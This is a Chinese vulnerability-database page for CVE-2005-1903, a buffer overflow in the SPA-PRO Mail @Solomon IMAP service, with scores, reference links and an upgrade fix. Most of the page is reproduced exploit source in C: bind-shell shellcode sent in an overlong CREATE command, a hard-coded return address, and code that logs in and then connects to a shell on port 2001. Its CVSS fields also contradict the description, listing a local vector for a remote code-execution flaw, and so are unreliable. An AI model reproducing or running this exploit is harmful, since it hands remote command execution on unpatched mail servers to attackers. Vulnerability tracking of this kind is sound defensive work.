CVE-2005-1903
CVSS2.1
发布时间 :2005-06-02 00:00:00
修订时间 :2011-03-07 21:23:04
NMCOE    

[原文]Buffer overflow in the IMAP service for SPA-PRO Mail @Solomon 4.00 allows remote authenticated users to execute arbitrary code via a long CREATE command.


[CNNVD]SPA-PRO Mail @Solomon IMAP服务 缓冲区溢出漏洞(CNNVD-200506-027)

        SPA-PRO Mail @Solomon 4.00的IMAP服务存在缓冲区溢出漏洞,远程认证用户可借助超长CREATE指令执行任意代码。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1903
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1903
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-027
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/20862
(VENDOR_ADVISORY)  XF  spa-pro-create-bo(20862)
http://www.security.org.sg/vuln/spa-promail4.html
(VENDOR_ADVISORY)  MISC  http://www.security.org.sg/vuln/spa-promail4.html
http://www.osvdb.org/16990
(VENDOR_ADVISORY)  OSVDB  16990
http://secunia.com/advisories/15573
(VENDOR_ADVISORY)  SECUNIA  15573
http://www.vupen.com/english/advisories/2005/0680
(UNKNOWN)  VUPEN  ADV-2005-0680
http://securitytracker.com/id?1014095
(UNKNOWN)  SECTRACK  1014095

- 漏洞信息

SPA-PRO Mail @Solomon IMAP服务 缓冲区溢出漏洞
低危 缓冲区溢出
2005-06-02 00:00:00 2005-10-20 00:00:00
本地  
        SPA-PRO Mail @Solomon 4.00的IMAP服务存在缓冲区溢出漏洞,远程认证用户可借助超长CREATE指令执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1026)

e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit (EDBID:1026)
windows remote
2005-06-02 Verified
143 Jerome Athias
N/A [点击下载]
//**************************************************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow 
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory 
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//**************************************************************************

#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")


unsigned char expBuf[] = 
"2 create \""
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
"\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
"\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
"\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
"\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
"\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
"\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
"\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
"\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
"\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
"\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
"\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
"\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
"\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
"\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF"
"\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79"
"\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6"
"\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C"
"\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF"
"\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50"
"\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD"
"\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24"
"\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56"
"\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54"
"\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF"
"\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42"
"\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"
"\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A"
"\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E"
"\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52"
"\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56"
"\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A"
"\"\r\n";


void shell(int sockfd)
{
	char buffer[1024];
	fd_set rset;
	FD_ZERO(&rset);

	for(;;)
	{
		if(kbhit() != 0)
		{		
			fgets(buffer, sizeof(buffer) - 2, stdin);
			send(sockfd, buffer, strlen(buffer), 0);
		}

		FD_ZERO(&rset);
		FD_SET(sockfd, &rset);

		timeval tv;
		tv.tv_sec = 0;
		tv.tv_usec = 50;
		
		if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
		{
			printf("select error\n");
			break;
		}
        
		if(FD_ISSET(sockfd, &rset))
		{
			int n;

			ZeroMemory(buffer, sizeof(buffer));
			if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
			{
				printf("EOF\n");
				return;
			}
			else
			{
				fwrite(buffer, 1, n, stdout);
			}
		}
	}
}


#define ADDR_POSITION		534
#define RET_ADDR			0x74F819D6		// CALL EBX in Japanese Win2K SP4

// First short jump backwards. (EB AO) 
// You should know what to change here, landing onto INT 3 to let debugger kick in.
#define FIRST_BACKJMP_INST	0x5AA0EBCC


int main(int argc, char* argv[])
{
	WORD wVersionRequested;
	WSADATA wsaData;
	struct sockaddr_in sin;
	int err;
	char inBuffer[10000];
	char loginBuf[1000];

	if(argc != 4)
	{
		printf("\nUsage: %s <imap username> <imap password> <ip addr>\n", argv[0]);
		return 1;
	}

	if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)
	{
		printf("\nInvalid IMAP username!  Maximum username length is 20.\n");
		return 1;
	}

	if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)
	{
		printf("\nInvalid IMAP password!  Maximum password length is 14.\n");
		return 1;
	}

	memset(loginBuf, 0, sizeof(loginBuf));
	_snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]);
	loginBuf[sizeof(loginBuf)-1] = 0;

	int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);
	
	*((DWORD *)&expBuf[retPos]) = RET_ADDR;
	*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;


	wVersionRequested = MAKEWORD(2,0);
	err = WSAStartup(wVersionRequested, &wsaData);
	if(err != 0)
	{
		printf("\nWSAStartup Error.\n");
		return 1;
	}

	if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
	{
		printf("\nWinsock Version Error\n");
		WSACleanup();
		return 1;
	}

	SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);

	sin.sin_addr.s_addr = inet_addr(argv[3]);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(143);

	printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr));

	if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
	{
		int size;
			
		// read IMAP banner
		size = recv(s, inBuffer, sizeof(inBuffer), 0);
		if(size == SOCKET_ERROR)
		{
			printf("[-] Error receiving IMAP banner!\n");
			return 1;
		}

		printf("[+] IMAP banner received!\n\n");
		fwrite(inBuffer, 1, size, stdout);
		printf("\n");

		if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)
		{
			printf("[-] Error sending login!\n");
			return 1;
		}

		printf("[+] Login Sent.\n");

		size = recv(s, inBuffer, sizeof(inBuffer), 0);
		if(size == SOCKET_ERROR)
		{
			printf("[-] Error receiving login reply!\n");
			return 1;
		}
		if(strstr(inBuffer, "OK"))
			printf("[+] Login successful!\n");
		else
		{
			printf("[+] Login failed!\n");
			return 1;
		}

		if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
		{
			printf("[-] Error sending exploit!\n");
			return 1;
		}
		else
		{
			printf("[+] Exploit sent!\n");
		}

		Sleep(2000);

		//================================= Connect to the target ==============================
		SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
		if(sock == INVALID_SOCKET)
		{
			printf("Invalid socket return in socket() call.\n");
			WSACleanup();
			return -1;
		}

		sin.sin_family = AF_INET;
		sin.sin_port = htons(2001);
		sin.sin_addr.s_addr = inet_addr(argv[3]);

		if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
		{
			printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");
			closesocket(sock);
			WSACleanup();
			return -1;
		}
		
		printf("[+] Exploit successful!\n\n");
		shell(sock);
		closesocket(sock);	
	}
	else
	{
		printf("[-] Cannot connect!\n");
	}

	closesocket(s);
	WSACleanup();

	return 0;
}

// milw0rm.com [2005-06-02]
		

- 漏洞信息

16990
SPA-PRO Mail @Solomon IMAP create Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in SPA-PRO Mail @Solomon. SPA-PRO Mail @Solomon fails to perform proper bounds checking on the create command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a remote overflow resulting in a loss of integrity.

- 时间线

2005-06-02 Unknow
Unknow Unknow

- 解决方案

Upgrade the SPA-IMAP4S component to version 4.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站